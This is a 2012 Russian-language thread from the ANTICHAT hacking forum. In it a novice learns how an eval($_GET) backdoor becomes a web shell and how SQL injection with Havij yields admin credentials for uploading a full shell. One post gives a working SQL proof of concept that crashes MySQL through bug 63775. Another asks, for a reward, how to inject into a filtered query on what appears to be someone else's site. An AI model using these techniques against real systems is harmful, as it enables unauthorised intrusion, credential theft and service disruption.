HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.08.2012, 08:51
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Всё что получалось по инструкции делал сам,но здесь немножко не понял,буду благодарен за помощь.
 

  #2  
Старый 31.08.2012, 00:05
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
Провел на форуме:
7224

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Просто не очень понял как при помощи этого кода '' залить shell.
Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
давай разжуём подробнее

eval - это команда, которая вычисляет/обрабатывает строку как PHP код. Т.е например будет равносильно .

А $_GET это переменная окружения, которая берёт содержимое из GET переменной, в данном случае переменная "e", т.е test.ru/index.php?e=PHP_Код

и если index.php будет содержать '', то скрипт выполнит код из переменной "e". Это своего рода минишелл, с помощью него можно залить полноценный. Через SQL инекцию ты код не выполнишь, за исключением, если БД поддерживает его, что очень редко. В замен в ней ты узнаешь пароль и логин админки и другие интересные данный, но это не всегда удаётся..

И потом уже через админку льёшь шелл

Что касается твоего случая... там вообще 4 ветка БД Мускла, так что таблицы необходимо подбирать, для этого можно воспользоваться спец софтом, тем же говнохавиджом. Тебе он самое то..

З.Ы И судя по твоему нику, ты сам окрещаешь себя как ламера, т.е ты завышаешь свои способности, а сам ничего не умеешь, следовательно можно с большой вероятностью предположить, что ты школьник, без обид. Советую отучится сперва, т.к твой интеллект ещё не развит для уровня логичного понимания запросов
 

  #3  
Старый 31.08.2012, 01:11
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Спасибо за обьяснение.А у хавиджа всегда какая-то ошибка,мутная прога.Школу закончил давно,просто сейчас только решил поковыряться с этим всем.
 

  #4  
Старый 31.08.2012, 01:45
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
Провел на форуме:
7224

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Спасибо за обьяснение.А у хавиджа всегда какая-то ошибка,мутная прога.Школу закончил давно,просто сейчас только решил поковыряться с этим всем.
Прога не мутная, тоже надо уметь пользоваться просто
 

  #5  
Старый 01.09.2012, 09:00
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
Провел на форуме:
34457

Репутация: -10
По умолчанию

Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
 

  #6  
Старый 01.09.2012, 09:54
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
Провел на форуме:
7224

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
Покажи, что вставляешь..
 

  #7  
Старый 01.09.2012, 10:51
DyukiN
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
Провел на форуме:
74477

Репутация: 21
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Странно у меня почти на всех уязвимых сайтах призапуске сканера выскакивает ошибка и после нажатия на ok закрываеться прога.
хавидж активирован?
 

  #8  
Старый 01.09.2012, 14:10
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

Насколько помню проблема решается указыванием корректного Keyword!
 

  #9  
Старый 13.09.2012, 07:39
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Не знал куда запостить, сюда наверно логичнее всего...

На статью не тянет, скорее заметка... Но тем не менее просто нужная информация...

Итак, если нам вдруг понадобится срочно перезагрузить MySQL, а прав на RELOAD нет, чтобы выполнить

Код:
FLUSH PRIVILEGES;
нам могут помочь следующие способы:

Способ №1:

Самый старый из найденных мной, но ни разу нигде не сработавших.

Тем не менее человек на этом форуме утверждает, что это возможно...

Тема 2008 года =)

Кратко: MySQL падает так как надо указывать имя триггера в виде `mydb`.`mytrigger`, а не просто mytrigger.

Код:
mysql> CREATE TRIGGER mytrigger AFTER INSERT
    ->     ON `mydb`.`mytable` FOR EACH ROW
    -> BEGIN END;
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
OC = Windows XP SP 2

MySQL 5.0.16


Проверил работоспособность на Centos-6.3 2.6.34

Скрин приведён ниже.



Результат - Способ не отработал.

Способ №2:

Заключается в эксплуатации бага #63775

Кратко: MySQL падает при чтении заголовка, следующего за удалённой записью.

Код:
#
# Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD.
#
 
-- source include/have_innodb.inc
 
CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
 
INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
 
DELETE FROM bug13510739 WHERE c=2;
 
HANDLER bug13510739 OPEN;
 
HANDLER bug13510739 READ `primary` = (2);
 
# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;
 
DROP TABLE bug13510739;
На оффициальном сайте говорится, что пофиксено начиная с версии 5.1.62

Решил испытать на своей системе, где версия MySQL 5.1.61.

Скрины ниже.





Зависимости:

MySQL 3


Результат - успешный перезапуск MySQL. PROFIT !!!


З.Ы. Это не дублирование - перетащил из другого места, тут логичнее всего оставить.
 

  #10  
Старый 15.11.2012, 01:51
aadktnbaov
Новичок
Регистрация: 06.06.2011
Сообщений: 14
Провел на форуме:
2564

Репутация: 0
По умолчанию

Вопрос знатокам в области SQL-инъекций.

Что можно поиметь полезного ??? если на сайте включен отчет об ошибках MySQL и с помощью него (отчета об ошибках) известно , что сайт из POST-запроса фильтрует (тупо убирает) ТОЛЬКО одинарные и двойные кавычки кавычки, остальные символы не фильтрует и передаёт в SQL-запрос как есть.

В частности не фильтрует обратный слэш ( \ ; ascii-код = 92 = 0x5C ) , с помощью которого (+ отчет об ошибках) и выяснено , какие именно символы сервис фильтрует из POST-запроса.

sql-запрос вида

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='postvalue1' AND `id`=postvalue2

postvalue2 всегда приводится к типу integer

hex-фишки типа 0х11 - не работают

сайт режет всю часть строки после нецифрового символа

т.е. postvalue2 , равное 123b456 преобразовывает для sql-запроса в 123

P.S.

за удачную инъекцию - щедрое вознаграждение
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.